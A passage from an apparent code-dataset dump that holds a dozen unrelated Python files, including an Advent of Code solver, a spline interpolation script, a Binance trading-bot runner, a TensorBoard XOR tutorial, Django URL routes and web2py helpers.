a) // self.get(b))\n\n def mod(self, a, b):\n setattr(self, a, getattr(self, a) % self.get(b))\n\n def eql(self, a, b):\n setattr(self, a, int(getattr(self, a) == self.get(b)))\n\n\ndef get_constraints(instructions):\n constraints = []\n stack = deque()\n line = 0\n\n for i in range(14):\n line += 4\n op = instructions[line].rstrip()\n\n assert op.startswith(\"div z \"), f'Invalid input! 
\"{op}\", \"{line}\"'\n\n if op == \"div z 1\": # first kind of chunk\n line += 11\n op = instructions[line]\n line += 3\n assert op.startswith(\"add y \"), \"Invalid input!\"\n\n a = int(op.split()[-1]) # first constant to add\n stack.append((i, a))\n else: # second kind of chunk\n line += 1\n op = instructions[line]\n line += 13\n assert op.startswith(\"add x \"), \"Invalid input!\"\n\n b = int(op.split()[-1]) # second constant to add\n j, a = stack.pop()\n constraints.append((i, j, a + b)) # digits[j] - digits[i] must equal a + b\n\n return constraints\n\n\ndef find_max(constraints):\n digits = [0] * 14\n\n for i, j, diff in constraints:\n if diff > 0:\n digits[i], digits[j] = 9, 9 - diff\n else:\n digits[i], digits[j] = 9 + diff, 9\n\n # Compute the actual number from its digits.\n num = 0\n for d in digits:\n num = num * 10 + d\n\n return num\n\n\ndef run(inputs):\n lines = inputs.split(os.linesep)\n alu = ArithmeticLogicUnit(lines)\n\n constraints = get_constraints(lines)\n max_num = find_max(constraints)\n deq = deque([int(i) for i in str(max_num)])\n\n alu.run(deq)\n assert alu.z == 0\n\n return max_num\n","sub_path":"2021/24/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"289151249","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom integration import n, n_1d\n\n# Create x and n lists for plotting.\nx_range = [1.e-4, 1.e-2, 1.e-1, 1, 5]\nn_x = []\n\n# Append values and save them for plotting.\nfor i in range(len(x_range)):\n n_x.append(n(x_range[i]))\n\n# Define the natural cubic spline method.\ndef cubic_spline(x, y, N):\n \"\"\"\n x ... input x value\n y ... funtion of x\n N ... number of fits (bigger the more accurate but slower)\n\n Choose interpolation method to be cubic spline.\n Natural cubic spline is a piece-wise interpolation method with low-degree polynomials, which will prevent excessive oscillations\n and non-convergence. 
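Concretely, on each interval [x_j, x_{j+1}] the value computed at the bottom of this function has the\n    closed form y = A*y_j + B*y_{j+1} + C*y''_j + D*y''_{j+1}, where h = x_{j+1} - x_j, A = (x_{j+1} - x)/h,\n    B = 1 - A, C = (A^3 - A)*h^2/6 and D = (B^3 - B)*h^2/6; the array f built below holds the second\n    derivatives y'' that this formula needs. 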
In this problem, we have nearly a linear log fit and the number of data points is only 5, meaning that the\n degree of polynomials will be low and the interpolation will be relatively accurate.\n The goal of cubic spline interpolation is to get an interpolation formula that is smooth in the first derivative and continuous\n in the second derivative, both within an interval and at its boundaries.\n \"\"\"\n\n # Initial setup.\n n = len(x)\n f = np.zeros(n)\n u = np.zeros(n)\n\n # The formula goes to N-2, so extend two more datapoints.\n xout = np.zeros(N+2)\n yout = np.zeros(N+2)\n\n # In case that besides the tabulated values of y_i, there are also tabulated values for the function’s second derivatives,\n # then we can add a cubic polynomial whose second derivative varies linearly from a value dy_j/dx on the left to a value d2y_j/dx2.\n # This will give us a continuous second derivative.\n\n # Define a polynomial to fit up to n orders that has zeros values at x_j and x_j+1.\n # This will prevent us from spoiling the the agreement with the tabulated functional values\n # y_j and y_j+1 at endpoints x_j and x_j+1.\n poly_nd = (y[n-1] - y[n-2])/(x[n-1] - x[n-2]) - (y[n-2] - y[n-3])/(x[n-2] -\n x[n-3]) + (y[n-1] - y[n-3])/(x[n-1] - x[n-3])\n\n # Decomposition loop, acquired from page 121 and 122.\n for i in range(1, n-1):\n sigma = (x[i] - x[i-1])/(x[i+1] - x[i-1])\n P = sigma*f[i-1] + 2.\n f[i] = (sigma - 1.)/P\n u[i] = (y[i+1] - y[i])/(x[i+1] - x[i]) - (y[i] - y[i-1])/(x[i] - x[i-1])\n u[i] = (6.*u[i]/(x[i + 1] - x[i - 1]) - sigma*u[i - 1])/P\n qn = 0.5\n un = (3./(x[n-1]-x[n-2]))*(poly_nd-(y[n-1]-y[n-2])/(x[n-1]-x[n-2]))\n\n # Fit the curve.\n f[n-1] = (un - qn*u[n-2])/(qn*f[n-2] + 1.)\n\n # Return the second derivative.\n for k in range(n-2, 1, -1):\n f[k] = f[k]*f[k+1] + u[k]\n\n # Initialization ends, begin interpolaton.\n for i in range(1, N+2):\n xout[i] = x[0] + (x[n-1] - x[0])*(i-1)/(N)\n\n # Use bisection method to find the interval between x_j and x_{j+1}.\n j = 0; j_plus_1 = n-1\n while (j_plus_1 - j >1):\n k = (j_plus_1 + j) >> 1\n if (x[k] > xout[i]):\n j_plus_1 = k\n else:\n j = k\n\n if (x[k] > xout[i]):\n j_plus_1 = k\n else:\n j = k\n\n # Apply the interpolation formula.\n h = x[j_plus_1] - x[j]\n A = (x[j_plus_1] - xout[i])/h\n B = (xout[i] - x[j])/h\n C = (A**3-A)*(h**2)/6.\n D = (B**3-B)*(h**2)/6.\n yout[i] = A*y[j] + B*y[j_plus_1] + C*f[j] + D*f[j_plus_1]\n\n # The first index of the output will be zero since everything starts there,\n # so taking the index number starting from one.\n return xout[1:], yout[1:]\n\n# Perform interpolation.\ninterp_density = cubic_spline(x_range, n_x, 1000)\n\n# Plot log-log of n(x) and its interplolation.\nplt.xlabel('log(x)')\nplt.ylabel('log(n)')\nplt.xscale('log') # log scale for x\nplt.yscale('log') # log scale for y\nplt.scatter(x_range, n_x, alpha=0.5, label='Data Points')\nplt.plot(interp_density[0], interp_density[1], 'r', label='Interplolation')\nplt.legend()\nplt.savefig('./plots/interpolation.png')\nplt.close()\n\n# Save as a text file.\nnp.savetxt('density_profile.txt', np.transpose([x_range, n_x]))\n","sub_path":"Hand_in_exercise_1/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"409731114","text":"N = int(input())\na = [None] * 145\nfor i in range(N):\n x = int(input())\n if a[x%144] == None:\n a[x%144] = x\n elif x < a[x%144]:\n a[x%144] = x\nmin = 1200 * 144 + 1\nfor i in 
range(122):\n if a[i] != None and a[144-i] != None:\n x = a[i] + a[144-i]\n if x < min and a[i] < a[144-i]:\n min = x\nif min == 1200 * 144 + 1: min == 0\nprint(min)\n \n \n \n","sub_path":"ex_27_exam/27(4).py","file_name":"27(4).py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"532093267","text":"#!/usr/bin/python\nfrom pymongo import Connection\n\ncats = Connection('10.0.0.8:27017').rynok.Category\n\ndef update(root_id=0, url=''):\n\n for cat in cats.find({\"ParentID\": root_id}):\n cat[\"URL\"] = url + '/' + cat[\"Translited\"].replace(\",\", \"\").replace(\"/\", \"\")\n cats.save(cat) \n update(cat[\"ID\"], cat[\"URL\"])\n\n return\n\nupdate()\n","sub_path":"ry/trunk-ry/rynok/other/update_url_cats.py","file_name":"update_url_cats.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"297949625","text":"#! /usr/bin/env python3\n\nimport sys\nimport os\nimport json\nimport time\n\nimport calls\nimport TradeIndicators\nimport Trading_Bot\n\n\n## This creates file paths.\nver = 6.5\ntraderBot = []\nextra_directory = (\"{0}/extra/\".format(os.getcwd()))\nsettings_file_path = (\"{0}settings.json\".format(extra_directory))\n\n## This creates the setting file if it was not found.\ndef initial_setup():\n\n\tif not os.path.isdir(extra_directory):\n\t\tos.mkdir(extra_directory)\n\n\tsettingFileDate = '{\"Currency_Allowed\" : 0.002,\\n\"Market\" : \"BTC-LTC\",\\n\"Time_Interval\" : \"5m\",\\n\"Keys\": {\"Public\" : \"None\",\\n\\t\"Secret\" : \"None\"}\\n}'\n\n\tlogFile = open(settings_file_path, 'w')\n\tlogFile.write(settingFileDate)\n\tlogFile.close()\n\n\ndef setup():\n\t## This sets up the traders and also formats the markets.\n\tglobal traderBot\n\n\tif not os.path.isfile(settings_file_path):\n\t\tsys.exit(\"There was an error reading settings file, try ./run init\")\n\n\t## This section is for reading data from the settings file and storing it.\n\tsettings_file = open(settings_file_path, 'r')\n\tsettings_file_data = json.loads(settings_file.read())\n\tsettings_file.close()\n\n\t## Start for settings file variable.\n\tTime_Interval = settings_file_data['Time_Interval']\n\tMarket = settings_file_data['Market'].upper()\n\tCurrency_Allowed = settings_file_data[\"Currency_Allowed\"]\n\tPKEY = settings_file_data['Keys']['Public']\n\tSKEY = settings_file_data['Keys']['Secret']\n\t## End of Custome Setting Variables ##\n\n\tprint(\"Binance Trader, Version: {0}, Time int: {1}, Market: {2}\".format(ver, Time_Interval, Market))\n\n\ttraderBot = Trading_Bot.trader(PKEY, SKEY, Market, float(Currency_Allowed), Time_Interval)\n\n\ndef run_bots():\n\t## This is the main calling section for the traders.\n\tforceUpdate = True\n\tmaxCycle = 10\n\tcycle = maxCycle-1\n\n\twhile True:\n\n\t\ttraderBot.update(forceUpdate)\n\n\t\tif not(forceUpdate):\n\t\t\ttraderBot.main()\n\n\t\tforceUpdate=False\n\n\t\ttime.sleep(3.4)\n\t\tif cycle == maxCycle:\n\t\t\tprint(\"]-------------------------------------------------[\")\n\t\t\tprint_data(traderBot.get_bot_info())\n\t\t\tprint(\"]-------------------------------------------------[\\n\\n\")\n\t\t\tcycle = 0\n\t\telse:\n\t\t\tcycle += 1\n\n\ndef print_data(data):\n\tMACD \t= data[\"Ind\"][\"MACD\"]\n\tprecis \t= data[\"MR\"][\"TICK_SIZE\"]\n\n\tprint(\"Market: {1} | overall: {2:.{0}f} | #Trades {3} | left: {4:.6f}\".format(precis, data[\"market\"], data[\"TS\"][\"overall\"], 
data[\"TS\"][\"#Trades\"], data[\"currencyLeft\"]))\n\t\n\tif data[\"status\"] == \"STANDBY_ERROR\":\n\t\tprint(\"[STATUS] Data Error, trying to fix... | lastUpdate: {0}\".format(data[\"time\"]))\n\t\t\n\telse:\n\t\tmarketTrade = \"Sell: {0}\".format(data[\"CTI\"][\"tradeTypes\"][\"S\"]) if str(data[\"CTI\"][\"tradeTypes\"][\"B\"]) == \"None\" else \"Buy: {0}\".format(data[\"CTI\"][\"tradeTypes\"][\"B\"])\n\t\tmarketOrder = \"Order Status: {0}\".format(data[\"CTI\"][\"orderStatus\"][\"S\"] if str(data[\"CTI\"][\"tradeTypes\"][\"B\"]) == \"None\" else data[\"CTI\"][\"orderStatus\"][\"B\"])\n\n\t\tif data[\"status\"] == \"RUNNING\":\n\t\t\tprint(\"[STATUS] {0} | {1} | lastUpdate: {2}\".format(marketTrade, marketOrder, data[\"time\"]))\n\n\t\tprint(\"[PRICES] buyPrice: {1:.{0}f} | sellPrice: {2:.{0}f} | lastPrice: {3:.{0}f}\".format(precis, data[\"CTI\"][\"buyPrice\"], data[\"CTI\"][\"sellPrice\"], data[\"CMI\"][\"lastPrice\"]))\n\t\tprint(\"[CONDITIONS] fast: {0:.8f} | slow: {1:.8f}\".format(MACD[0][\"fast\"], MACD[0][\"slow\"]))\n\n\nif __name__ == \"__main__\":\n\n\tif len(sys.argv) == 1: \n\t\tsetup()\n\t\trun_bots()\n\telif sys.argv[1] == \"init\":\n\t\tinitial_setup()\n\t\tprint(\"Initilization Successfull\")\n\telse:\n\t\tprint(\"incorrect argument\")\n\t\n\n\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"22127629","text":"import random\r\n\r\n\r\nclass Weapon:\r\n\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n if name == \"Sword\":\r\n self.dmg = range(35, 41)\r\n self.cth = 0.75 # chance to hit\r\n\r\n elif name == \"Fists\":\r\n self.dmg = range(5, 6)\r\n self.cth = 0.8\r\n\r\n elif name == \"Spear\":\r\n self.dmg = range(22, 27)\r\n self.cth = 0.95\r\n\r\n elif name == \"Dagger\":\r\n self.dmg = range(10, 16)\r\n self.cth = 0.80\r\n\r\n elif name == \"Claws\":\r\n self.dmg = range(10, 12)\r\n self.cth = 0.7\r\n\r\n elif name == \"Bite\":\r\n self.dmg = 18\r\n self.cth = 0.4\r\n\r\n elif name == \"Kobold Spear\":\r\n self.dmg = range(8, 9)\r\n self.cth = 0.6\r\n\r\n def strike(self):\r\n if random.uniform(0, 1) > self.cth:\r\n print('The attack missed!')\r\n return 0\r\n else:\r\n print('The attack struck true!')\r\n return self.dmg[random.randint(0, len(self.dmg))-1]\r\n\r\n\r\n# test_sword = Weapon(\"Sword\")\r\n#\r\n# for i in range(0, 5):\r\n# print(test_sword.strike())\r\n","sub_path":"Weapon.py","file_name":"Weapon.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"234298707","text":"#TensorBoard\r\n\r\n#tensorbard 는 deep하고 wide하게 만들 때, 그 진행과정을 만드는 유용한 방법임. (그래프를 그림)\r\n#step에 따라서 loss가 어떻게 변화하는지를 볼 수 있음.\r\n# 이전에는 단순히 print로 본 것에서 upgrade 한 것임.\r\n\r\n#아래�� 5개의 step을 따라간다면, 멋진 그래프를 그릴 수 있음.\r\n\r\n############ 요약 ############\r\n\r\n#### 1 From TF graph, decide which tensors you want to log\r\n#### w2_hist = tf.summary.histogram('weights2',w2)\r\n#### cost_summ = tf.summary.scalar('cost',cost)\r\n\r\n#### 2. Merge all summaries\r\n#### summary = tf.summary.merge_all()\r\n\r\n#### 3. Create writer and add graph\r\n#### writer = tf.summary.FileWriter('./logs') #full path 입력해보기. // 어느위치에 경로를 적을껀지\r\n#### writer.add_graph(sess.graph) #같이 쓰면 됨.\r\n\r\n#### 4. 
Run summary merge and add_summary #summary자체도 tense이기 때문에 실행시켜야함.\r\n#### s, _ = sess.run([summary , optimizer],feed_dict=feed_dict)\r\n#### writer.add_summary(s , global_step=global_step) #실제로 파일에 기록하는 함수.\r\n\r\n#### 5. Launch TensorBoard #터미널 가서, 정해진 디렉토리를 '=' 오른쪽에 넣기\r\n#### tensorboard --logdir=./logs #\"--logdir=./logs\" 띄어쓰기 없이 하기\r\n\r\n#############################################################################################\r\n\r\n\r\n\r\n############ 순서 시작 ############\r\n\r\n# 1. 열심히 코드를 실행한다. (import부터 for문 다 돌리는거까지)\r\n# 2. 터미널에 [[[ tensorboard --logdir=./logs ]]] 를 실행한다.\r\n#### 이 의미는 , [[[ C:\\Users\\82104\\PycharmProjects\\untitled\\logs]]] 를 실행하는것. ###\r\n# 혹은, [[[ tensorboard --logdir=path/to/log-directory]]] 를 실행한다.\r\n# 이때, writer = tf.summary.FileWriter(\"./logs/xor_logs\") 와 같이 되어있을 것이다.\r\n# 참고 사이트 : https://tensorflowkorea.gitbooks.io/tensorflow-kr/content/g3doc/how_tos/summaries_and_tensorboard/\r\n\r\n# 3. 인터넷에 가서 [[[ localhost:6006 ]]] 를 입력하고 확인한다.\r\n# 4. 터미널을 종료하려면 [[[ ctrl+c ]]]를 누른다.\r\n\r\n# 5. 만약 여러개를 실행하고 싶으면,\r\n# 5-1 )\r\n# 코드 중 [[[ writer = tf.summary.FileWriter(\"./logs/xor_logs\") ]]] 로 바꾼다.\r\n# 또한 다르게 돌릴 목적에 맞게 코드를 수정한다. (ex: learning_rate = 0.1)\r\n# 터미널에 [[[ tensorboard --logdir=./logs/xor_logs ]]] 하고 데이터 돌리고 터미널 종료.\r\n# 5-2)\r\n# 코드 중 [[[ writer = tf.summary.FileWriter(\"./logs/xor_logs_r0_01\") ]]] 로 바꾼다.\r\n# 또한 다르게 돌릴 목적에 맞게 코드를 수정한다. (ex: learning_rate = 0.001)\r\n# 터미널에 [[[ tensorboard --logdir=./logs/xor_logs_r0_01 ]]] 하고 데이터 돌리고 터미널 종료.\r\n# 5-3)\r\n# 그리고 최종적으로 [[[ tensorboard --logdir=./logs ]]] 를 실행\r\n# 이러면 동시에 볼 수 있게 된다.\r\n\r\n#6. 만약 서버를 할당받고 싶으면,\r\n# 터미널에 [[[ ssh -L 7007:121.0.0.0:6006 donggyu@server.com ]]] 이라 하면,\r\n# 6006번에 해당하는게 7007번으로 donggyu이름을 지닌채 할당받음.\r\n# 이후 , 인터넷 주소창에 [[[ localhost:7007 ]]] 을 입력한다.\r\n\r\n############ 순서 끝 ############\r\n\r\n#Tensorboard Tip)\r\n# 1. Scalars\r\n# smoothing : 이동평균을 취해서 부드럽게 하라는것. 0값을 넣으면, 원데이터 그대로를보여줌.\r\n# 나머지는 직관적으로 볼 수 있음.\r\n\r\n#2. Graphs\r\n#우리가 어떻게 코딩을 했고, 어떤 알고리즘을 갖는지 시각적으로 표현하는 파트.\r\n#with문을 쓰고, name_scope를 쓰는 이유는 이 파트에서 깔끔하게 보기 위함.\r\n#그래프들을 더블클릭해서 세부 계산 과정을 볼 수 있음. 확인 해보기.\r\n\r\n#3. Histograms\r\n# y축은 step, x축은 벡터들의 원소가 가지는 각 값에 대한 분포임.\r\n# 즉, step 이 경과함에 따라 어떻게 값이 변화하는지를 볼 수 있음.\r\n\r\n###############################\r\n##### Tensorboard\r\n# Lab 9 XOR\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\ntf.set_random_seed(777) # for reproducibility\r\n\r\nx_data = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.float32)\r\ny_data = np.array([[0], [1], [1], [0]], dtype=np.float32)\r\n\r\nX = tf.placeholder(tf.float32, [None, 2], name=\"x\") #아래에서도 마찬가지지만, 이름을 정하자.\r\nY = tf.placeholder(tf.float32, [None, 1], name=\"y\")\r\n\r\n#Add scope for better graph hierarchy\r\n#그래프를 그릴때, layer1과 layer2를 보기 좋게 만들 수 있음.\r\n#아래처럼 하는걸 습관화하자. 
(tf.name_scope는 tensorboard에서 그래프 구성을 깔끔하게 볼 수 있도록 도와줌.)\r\n\r\nwith tf.name_scope(\"Layer1\"): #Layer1은 이름정한것.\r\n W1 = tf.Variable(tf.random_normal([2, 2]), name=\"weight_1\")\r\n b1 = tf.Variable(tf.random_normal([2]), name=\"bias_1\")\r\n layer1 = tf.sigmoid(tf.matmul(X, W1) + b1)\r\n\r\n tf.summary.histogram(\"W1\", W1) #tf.summary 매서드를 잊지말기.\r\n tf.summary.histogram(\"b1\", b1)\r\n tf.summary.histogram(\"Layer1\", layer1)\r\n\r\nwith tf.name_scope(\"Layer2\"):\r\n W2 = tf.Variable(tf.random_normal([2, 1]), name=\"weight_2\")\r\n b2 = tf.Variable(tf.random_normal([1]), name=\"bias_2\")\r\n hypothesis = tf.sigmoid(tf.matmul(layer1, W2) + b2)\r\n\r\n tf.summary.histogram(\"W2\", W2)\r\n tf.summary.histogram(\"b2\", b2)\r\n tf.summary.histogram(\"Hypothesis\", hypothesis)\r\n\r\n# cost/loss function\r\nwith tf.name_scope(\"Cost\"): #cost와 train 또한 그래프로 만들어 버린다. 습관화.\r\n cost = -tf.reduce_mean(Y * tf.log(hypothesis) + (1 - Y) * tf.log(1 - hypothesis))\r\n tf.summary.scalar(\"Cost\", cost) #cost는 scalar이기에, histogram 문법을 쓰지 않는다.\r\n\r\nwith tf.name_scope(\"Train\"):\r\n train = tf.train.AdamOptimizer(learning_rate=0.01).minimize(cost)\r\n#AdamOptimizer 란,\r\n# Momentum(모멘텀) + RMSprop(알엠에스프롭) 기법이 혼합된 최적화기법\r\n# (관성 효과 + 지수이동평균 의 혼합이다.) 이런게 있다 하고 넘어가기.\r\n#다음의 사이트를 참고하면 Optimizer들에 대한 이야기를 자세히 살필 수 있다.\r\n# https://twinw.tistory.com/247\r\n\r\n# Accuracy computation\r\n# True if hypothesis>0.5 else False\r\npredicted = tf.cast(hypothesis > 0.5, dtype=tf.float32)\r\naccuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))\r\ntf.summary.scalar(\"accuracy\", accuracy) #accuracy 또한 scalar이기에, histogram 문법을 쓰지 않는다.\r\n\r\n# Launch graph\r\nwith tf.Session() as sess:\r\n # tensorboard --logdir=./logs/xor_logs_r0_01 였음.\r\n merged_summary = tf.summary.merge_all() #요약 할것을 다합쳐버리고,\r\n writer = tf.summary.FileWriter(\"./logs/xor_logs_r0_01\") # 이 경로에 정보를 넣는다.\r\n # 이의미는 , C:\\Users\\82104\\PycharmProjects\\untitled\\logs\\xor_logs_r0_01 를 실행하는것.\r\n writer.add_graph(sess.graph) # Show the graph & Add graph in the tensorboard\r\n\r\n # Initialize TensorFlow variables\r\n sess.run(tf.global_variables_initializer())\r\n\r\n for step in range(10001):\r\n _, summary, cost_val = sess.run(\r\n [train, merged_summary, cost], feed_dict={X: x_data, Y: y_data} #train 시키면서 요약된 값들도 얻어내고,\r\n )\r\n writer.add_summary(summary, global_step=step) #요약본을 step이 진행될수록 계속 합쳐버리면서 누적시킨다. 이때 writer변수는\r\n #경로에 해당하는 변수이고, 데이터가 저장되는 공간 (위에서 정의함.)\r\n #add_summary(summary,step) 와 add_graph(sess.graph)를 잊지 말기.\r\n\r\n if step % 1000 == 0:\r\n print(step, cost_val)\r\n\r\n # Accuracy report\r\n h, p, a = sess.run(\r\n [hypothesis, predicted, accuracy], feed_dict={X: x_data, Y: y_data}\r\n )\r\n\r\n print(f\"\\nHypothesis:\\n{h} \\nPredicted:\\n{p} \\nAccuracy:\\n{a}\")\r\n\r\n\r\n##### 과제 해보기. mnist","sub_path":"Self_study/2019_Summer/Prof. 
KimSungHun Neural Network (Video)/Pycharm/9_2_Tensorboard_for_XOR_NN.py","file_name":"9_2_Tensorboard_for_XOR_NN.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"156110441","text":"import os\nimport time\nimport pytest\nimport yaml\nimport allure\n\nfrom codeself.query import QueryApi\n\nyaml_file_path = os.path.dirname(__file__) + \"/citycode.yml\"\n\nwith open(yaml_file_path, encoding='utf-8') as f:\n dates = yaml.safe_load(f)\n citycode = dates['city']['ccode']\n qqcode = dates['qq']['code']\n qqid = dates['qq']['myid']\n\n@allure.feature(\"测试类1\")\nclass Testyiqin(QueryApi):\n def setup_class(self):\n self.query = QueryApi()\n\n\n @allure.story(\"测试方法1\")\n @pytest.mark.repeat(3)\n @pytest.mark.parametrize('cc', citycode)\n def test_anhui(self, cc):\n with allure.step('步骤1'):\n print(\"buzhou1\")\n r = self.s_query()\n # print(r)\n ass_list = self.query.jsonpath_res(r, \"$..city_id\")\n print(ass_list)\n assert cc in ass_list\n assert r['reason'] == 'success!'\n\n @allure.story(\"测试方法12\")\n @pytest.mark.parametrize(('key', 'qq'), qqcode, ids=qqid)\n def test_qq1(self, key, qq):\n r = self.qq_yun(key, qq)\n print(r)\n if r['reason'] == 'success!':\n assert r['error_code'] == 0\n elif r['reason'] == '错误的请求参数':\n assert r['error_code'] == 216602\n\n","sub_path":"codeself/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"584012856","text":"\"\"\"Đường dẫn tới các api\n\n\"\"\"\nfrom django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom api import views\n\nurlpatterns = [\n path('cases', views.CaseList.as_view()),\n path('cases//', views.CaseDetail.as_view()),\n path('teams', views.TeamList.as_view()),\n path('teams//', views.TeamDetail.as_view()),\n # path('contacts', views.ContactList.as_view()),\n # path('contacts//', views.ContactDetail.as_view()),\n # path('accounts', views.AccountList.as_view()),\n # path('accounts//', views.AccountDetail.as_view()),\n # path('addresses', views.AddressList.as_view()),\n # path('addresses//', views.AddressDetail.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)","sub_path":"MyProject/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"50675504","text":"import requests\nimport json\n\nfrom zaifapi import *\n\ndef zaif(api_key, api_key_secret):\n\n output_dict = {}\n fiat_values = {}\n\n try:\n pub = ZaifPublicApi()\n \n balances = ZaifTradeApi(api_key, api_key_secret).get_info()['funds']\n\n output_dict = {key.upper():value for key, value in balances.items() if float(value) > 0.0}\n for key, value in output_dict.items():\n if key == \"JPY\":\n fiat_values[key] = value\n elif key == \"BTC\":\n fiat_values[key] = float(pub.last_price('btc_jpy')['last_price']) * float(value)\n elif key == \"XEM\":\n fiat_values[key] = float(pub.last_price('xem_jpy')['last_price']) * float(value)\n elif key == \"MONA\":\n fiat_values[key] = float(pub.last_price('mona_jpy')['last_price']) * float(value)\n\n return [output_dict,fiat_values]\n\n except:\n return 
[output_dict,fiat_values]","sub_path":"markets/zaif.py","file_name":"zaif.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"200822645","text":"import numpy as np\n\ndata = np.random.random((200, 2))\ndata = data*100\n\nds = []\nfor x in data:\n x = list(x)\n if x[0]<=40 and x[1]<=40:\n x.append('1.0')\n ds.append(x)\n elif x[0]>=60 and x[1]>=60:\n x.append('0.0')\n ds.append(x)\n\nfp = open('owndata.txt', \"w\")\nfor x in ds:\n fp.write(str(round(x[0], 3))+'\\t'+str(round(x[1], 3))+'\\t'+ str(x[2]) +'\\n')\nfp.close()\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"482184776","text":"# -*- coding: utf-8 -*-\nimport re\n\ndef fun_input(ident, titulo, fondo=\"\",tipo=\"text\",valor=\"\" ):\n\tsalida = DIV(_class=\"form-group\")\n\tif tipo==\"checkbox\":\n\t\tsalida.append(INPUT(_type=\"checkbox\",_id=ident, _name=ident, value=valor))\n\t\tsalida.append(\"|\")\n\t\tsalida.append(LABEL(titulo))\n\telif tipo==\"textarea\":\n\t\tsalida.append(LABEL(titulo,_for=f\"lb_{titulo}\"))\n\t\tsalida.append(TEXTAREA(valor, _cols=60))\n\telse:\n\t\tsalida.append(LABEL(titulo,_for=f\"lb_{titulo}\"))\n\t\tsalida.append(INPUT(_type=tipo, _id=ident, _name=ident, _class=\"form-control\",_placeholder=fondo, value=valor) )\n\n\treturn salida\n\ndef es_correo_valido(correo):\n if correo==None: return None\n expresion_regular = r\"(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\\\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\\\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])\"\n return re.match(expresion_regular, correo) is not None\n\ndef fun_ActivarDataTable():\n\t##Envia los script necesario para activar datatable\n\tresponse.files.append(URL('static','js/jquery.dataTables.js'))\n\tresponse.files.append(URL('static','js/dataTables.buttons.min.js'))\n\tresponse.files.append(URL('static','js/buttons.flash.min.js'))\n\tresponse.files.append(URL('static','js/jszip.min.js'))\n\tresponse.files.append(URL('static','js/pdfmake.min.js'))\n\tresponse.files.append(URL('static','js/vfs_fonts.js'))\n\tresponse.files.append(URL('static','js/buttons.html5.min.js'))\n\tresponse.files.append(URL('static','js/buttons.print.min.js'))\n\tresponse.files.append(URL('static','css/jquery.dataTables.min.css'))\n\tresponse.files.append(URL('static','css/buttons.dataTables.min.css'))\n\ndef itemmenus(contenedor,items):\n\tmenus=LI(contenedor, _class=\"nav-header alert-primary\")\n\tfor item in items:\n\t\tmenus.append(LI(A(DIV(\n\t\t\t\t\t\t\tDIV(I(_class=item[0], _style=\"color:yellow\"), _class=\"col-sm-2\"),\n\t\t\t\t\t\t\tDIV(item[1],_class=\"col-sm-10 nav-header\"),\n\t\t\t\t\t\t\t_class=\"row\"),\n\t\t\t\t\t\t_href=item[2])\n\t\t\t\t\t\t))\n\treturn menus\n\ndef fun_Menu():\n\tsalida=UL(_class=\"nav\")\n\tsalida.append(itemmenus(\"\",(\n\t\t\t\t\t\t\t\t\t(\"fas fa-home\",T('Home'), URL('default', 'index')),\n\t\t\t\t\t\t\t\t\t)))\n\n\tif auth.has_membership(\"Administradores\") or 
